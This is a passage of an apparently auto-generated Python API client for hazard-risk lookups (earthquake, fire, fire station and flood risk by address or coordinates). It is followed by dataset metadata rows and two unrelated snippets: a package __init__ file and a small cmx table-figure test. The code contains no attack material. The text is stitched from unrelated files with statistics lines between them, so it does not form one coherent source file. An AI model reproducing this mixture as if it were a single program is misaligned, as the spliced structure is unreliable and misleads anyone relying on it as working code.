This is a Batch offering for 'Earthquake Risk By Address' service. It accepts a single address or a list of addresses and retrieve counts of earthquakes for various richter measurements and values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_earthquake_risk_by_address_batch(earthquake_risk_by_address_request, async_req=True)
>>> result = thread.get()
Args:
earthquake_risk_by_address_request (EarthquakeRiskByAddressRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
EarthquakeRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['earthquake_risk_by_address_request'] = \
earthquake_risk_by_address_request
return self.get_earthquake_risk_by_address_batch_endpoint.call_with_http_info(**kwargs)
def get_earthquake_risk_by_location(
self,
longitude,
latitude,
**kwargs
):
"""Get Earthquake Risk By Location # noqa: E501
Accepts latitude & longitude as input and Returns counts of earthquakes for various richter measurements and values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_earthquake_risk_by_location(longitude, latitude, async_req=True)
>>> result = thread.get()
Args:
longitude (str): The longitude of the location
latitude (str): The latitude of the location
Keyword Args:
richter_value (str): all (default value), R0, R1, R2, R3, R4, R5, R6, R7, R0_GE, R1_GE, R2_GE, R3_GE, R4_GE, R5_GE, R6_GE, R7_GE. [optional]
include_geometry (str): Y or N (default is N) - if it is Y, then geometry will be part of response. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
EarthquakeRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['longitude'] = \
longitude
kwargs['latitude'] = \
latitude
return self.get_earthquake_risk_by_location_endpoint.call_with_http_info(**kwargs)
def get_earthquake_risk_by_location_batch(
self,
earthquake_risk_by_location_request,
**kwargs
):
"""Post Earthquake Risk By Location # noqa: E501
This is a Batch offering for 'Earthquake Risk By Location' service. It accepts a single location coordinate or a list of location coordinates and retrieve counts of earthquakes for various richter measurements and values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_earthquake_risk_by_location_batch(earthquake_risk_by_location_request, async_req=True)
>>> result = thread.get()
Args:
earthquake_risk_by_location_request (EarthquakeRiskByLocationRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
EarthquakeRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['earthquake_risk_by_location_request'] = \
earthquake_risk_by_location_request
return self.get_earthquake_risk_by_location_batch_endpoint.call_with_http_info(**kwargs)
def get_fire_history(
self,
post_code,
**kwargs
):
"""Get Fire History # noqa: E501
Accepts postcode as input and Returns fire event details for a particular postcode. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_history(post_code, async_req=True)
>>> result = thread.get()
Args:
post_code (str): 5 digit Postal code to search
Keyword Args:
start_date (str): Start time in milliseconds(UTC). [optional]
end_date (str): End time in milliseconds(UTC). [optional]
max_candidates (str): Maximum response events. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FireHistory
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['post_code'] = \
post_code
return self.get_fire_history_endpoint.call_with_http_info(**kwargs)
def get_fire_risk_by_address(
self,
address,
**kwargs
):
"""Get Fire Risk By Address # noqa: E501
Accepts addresses as input and Returns fire risk data by risk types. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_risk_by_address(address, async_req=True)
>>> result = thread.get()
Args:
address (str): Free form address text
Keyword Args:
include_geometry (str): Flag to return Geometry default is N. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FireRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['address'] = \
address
return self.get_fire_risk_by_address_endpoint.call_with_http_info(**kwargs)
def get_fire_risk_by_address_batch(
self,
fire_risk_by_address_request,
**kwargs
):
"""Post Fire Risk By Address # noqa: E501
This is a Batch offering for 'Fire Risk By Address' service. It accepts a single address or a list of addresses and retrieve fire risk data by risk types. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_risk_by_address_batch(fire_risk_by_address_request, async_req=True)
>>> result = thread.get()
Args:
fire_risk_by_address_request (FireRiskByAddressRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FireRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['fire_risk_by_address_request'] = \
fire_risk_by_address_request
return self.get_fire_risk_by_address_batch_endpoint.call_with_http_info(**kwargs)
def get_fire_risk_by_location(
self,
longitude,
latitude,
**kwargs
):
"""Get Fire Risk By Location # noqa: E501
Accepts latitude & longitude as input and Returns fire risk data by risk types. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_risk_by_location(longitude, latitude, async_req=True)
>>> result = thread.get()
Args:
longitude (str): Longitude of Location
latitude (str): Latitude of Location
Keyword Args:
include_geometry (str): Flag to return Geometry default is N. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FireRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['longitude'] = \
longitude
kwargs['latitude'] = \
latitude
return self.get_fire_risk_by_location_endpoint.call_with_http_info(**kwargs)
def get_fire_risk_by_location_batch(
self,
fire_risk_by_location_request,
**kwargs
):
"""Post Fire Risk By Location # noqa: E501
This is a Batch offering for 'Fire Risk By Location' service. It accepts a single location coordinate or a list of location coordinates and retrieve fire risk data by risk types. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_risk_by_location_batch(fire_risk_by_location_request, async_req=True)
>>> result = thread.get()
Args:
fire_risk_by_location_request (FireRiskByLocationRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FireRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['fire_risk_by_location_request'] = \
fire_risk_by_location_request
return self.get_fire_risk_by_location_batch_endpoint.call_with_http_info(**kwargs)
def get_fire_station_by_address(
self,
address,
**kwargs
):
"""Get Fire Station By Address # noqa: E501
Accepts addresses as input and Returns nearest fire stations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_station_by_address(address, async_req=True)
>>> result = thread.get()
Args:
address (str): Free Address
Keyword Args:
max_candidates (str): Specifies the maximum number of fire stations that this service retrieves. The default value is 3 and maximum value is 5. The retrieved results are traveldistance sorted from the input location.. [optional]
travel_time (str): Max travel time from input location to fire station. Maximum allowed is 2 hours. [optional]
travel_time_unit (str): minutes (default), hours, seconds, milliseconds. [optional]
travel_distance (str): Max travel distance from input location to fire station. Maximum allowed is 50 miles. [optional]
travel_distance_unit (str): Feet (default), Kilometers, Miles, Meters. [optional]
sort_by (str): time (default), distance. [optional]
historic_traffic_time_bucket (str): Historic traffic time slab. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FireStations
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['address'] = \
address
return self.get_fire_station_by_address_endpoint.call_with_http_info(**kwargs)
def get_fire_station_by_location(
self,
longitude,
latitude,
**kwargs
):
"""Get Fire Station By Location # noqa: E501
Accepts latitude & longitude as input and Returns nearest fire stations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_station_by_location(longitude, latitude, async_req=True)
>>> result = thread.get()
Args:
longitude (str): Longitude of Location
latitude (str): Latitude of Location
Keyword Args:
max_candidates (str): Specifies the maximum number of fire stations that this service retrieves. The default value is 3 and maximum value is 5. The retrieved results are traveldistance sorted from the input location.. [optional]
travel_time (str): Max travel time from input location to fire station. Maximum allowed is 2 hours. [optional]
travel_time_unit (str): minutes (default), hours, seconds, milliseconds. [optional]
travel_distance (str): Max travel distance from input location to fire station. Maximum allowed is 50 miles. [optional]
travel_distance_unit (str): Feet (default), Kilometers, Miles, Meters. [optional]
sort_by (str): time (default), distance. [optional]
historic_traffic_time_bucket (str): Historic traffic time slab. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FireStations
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['longitude'] = \
longitude
kwargs['latitude'] = \
latitude
return self.get_fire_station_by_location_endpoint.call_with_http_info(**kwargs)
def get_flood_risk_by_address(
self,
address,
**kwargs
):
"""Get Flood Risk By Address # noqa: E501
Accepts addresses as input and Returns flood risk data for flood zones and base flood elevation values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_flood_risk_by_address(address, async_req=True)
>>> result = thread.get()
Args:
address (str): Free text Address
Keyword Args:
include_zone_desc (str): Flag to return zone description. [optional]
include_geometry (str): Flag to return Geometry. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FloodRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['address'] = \
address
return self.get_flood_risk_by_address_endpoint.call_with_http_info(**kwargs)
def get_flood_risk_by_address_batch(
self,
flood_risk_by_address_request,
**kwargs
):
"""Post Flood Risk By Address # noqa: E501
This is a Batch offering for 'Flood Risk By Address' service. It accepts a single address or a list of addresses and retrieve flood risk data for flood zones and base flood elevation values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_flood_risk_by_address_batch(flood_risk_by_address_request, async_req=True)
>>> result = thread.get()
Args:
flood_risk_by_address_request (FloodRiskByAddressRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FloodRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['flood_risk_by_address_request'] = \
flood_risk_by_address_request
return self.get_flood_risk_by_address_batch_endpoint.call_with_http_info(**kwargs)
def get_flood_risk_by_location(
self,
longitude,
latitude,
**kwargs
):
"""Get Flood Risk By Location # noqa: E501
Accepts latitude & longitude as input and Returns flood risk data for flood zones and base flood elevation values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_flood_risk_by_location(longitude, latitude, async_req=True)
>>> result = thread.get()
Args:
longitude (str): Longitude of Location
latitude (str): Latitude of Location
Keyword Args:
include_zone_desc (str): Flag to return zone description. [optional]
include_geometry (str): Flag to return Geometry. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FloodRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['longitude'] = \
longitude
kwargs['latitude'] = \
latitude
return self.get_flood_risk_by_location_endpoint.call_with_http_info(**kwargs)
def get_flood_risk_by_location_batch(
self,
flood_risk_by_location_request,
**kwargs
):
"""Post Flood Risk By Location # noqa: E501
This is a Batch offering for 'Flood Risk By Location' service. It accepts a single location coordinate or a list of location coordinates and retrieve flood risk data for flood zones and base flood elevation values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_flood_risk_by_location_batch(flood_risk_by_location_request, async_req=True)
>>> result = thread.get()
Args:
flood_risk_by_location_request (FloodRiskByLocationRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FloodRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['flood_risk_by_location_request'] = \
flood_risk_by_location_request
return self.get_flood_risk_by_location_batch_endpoint.call_with_http_info(**kwargs)
| 39.099102 | 259 | 0.513979 | 12,090 | 130,591 | 5.28048 | 0.028371 | 0.0289 | 0.019549 | 0.0203 | 0.973356 | 0.961107 | 0.93324 | 0.914679 | 0.890384 | 0.879388 | 0 | 0.003603 | 0.404905 | 130,591 | 3,339 | 260 | 39.110812 | 0.817884 | 0.361962 | 0 | 0.711445 | 0 | 0 | 0.258835 | 0.06512 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011047 | false | 0.010605 | 0.012373 | 0 | 0.034468 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eb56d9490a5d1f6969032089c31c489e2d02cab9 | 43 | py | Python | app/__init__.py | bruh-boys/reddit-automata | fc433847be8f6b76dfcf597b96c696598af58383 | [
"MIT"
] | 7 | 2022-01-05T09:28:53.000Z | 2022-02-01T23:41:07.000Z | app/__init__.py | bruh-boys/reddit-automata | fc433847be8f6b76dfcf597b96c696598af58383 | [
"MIT"
] | null | null | null | app/__init__.py | bruh-boys/reddit-automata | fc433847be8f6b76dfcf597b96c696598af58383 | [
"MIT"
] | null | null | null | from .text import *
from .generate import * | 21.5 | 23 | 0.744186 | 6 | 43 | 5.333333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 43 | 2 | 23 | 21.5 | 0.888889 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
eb91004a7fe693a277ad3e9fde8b381a0547fad2 | 734 | py | Python | tests/test_table_figure_row.py | cmx/cmx-python | 02d2b71ac3d7d640764c8b0778018468d8abe337 | [
"MIT"
] | 1 | 2021-07-27T13:25:14.000Z | 2021-07-27T13:25:14.000Z | tests/test_table_figure_row.py | cmx/cmx-python | 02d2b71ac3d7d640764c8b0778018468d8abe337 | [
"MIT"
] | null | null | null | tests/test_table_figure_row.py | cmx/cmx-python | 02d2b71ac3d7d640764c8b0778018468d8abe337 | [
"MIT"
] | null | null | null | from cmx.backends.components import Article
doc = Article()
table = doc.table()
row = table.figure_row()
row.figure(src="some_file.png", title="some title", caption="some text")
row.figure(src="some_file.png", title="some title", caption="some text")
row.figure(src="some_file.png", title="some title", caption="some text")
row.figure(src="some_file.png", title="some title", caption="some text")
row = table.figure_row()
row.figure(src="some_file.png", title="some title", caption="some text")
row.figure(src="some_file.png", title="some title", caption="some text")
row.figure(src="some_file.png", title="some title", caption="some text")
